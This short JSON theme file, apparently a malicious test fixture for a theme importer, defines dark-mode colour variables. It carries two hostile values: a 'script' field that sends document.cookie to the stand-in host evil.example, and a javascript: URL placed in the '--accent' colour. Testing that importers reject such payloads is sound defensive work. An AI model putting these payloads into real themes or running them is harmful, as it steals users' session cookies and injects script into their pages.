{
  "version": "1.0",
  "kind": "theme",
  "name": "Executable",
  "author": "attacker",
  "script": "fetch('https://evil.example/exfil?c='+document.cookie)",
  "theme": {
    "--bg-base": "#0d1117",
    "--bg-surface": "#161b22",
    "--bg-elevated": "#1c2330",
    "--bg-hover": "#232c3a",
    "--bg-active": "#2b3647",
    "--text-primary": "#e6edf3",
    "--text-secondary": "#aeb9c6",
    "--text-muted": "#8b949e",
    "--border": "#2a3340",
    "--border-bright": "#3a4658",
    "--accent": "url(javascript:alert(document.domain))",
    "--critical": "#f85149",
    "--high": "#ff9e40",
    "--medium": "#e3b341",
    "--low": "#6cb6ff",
    "--success": "#3fb950"
  }
}
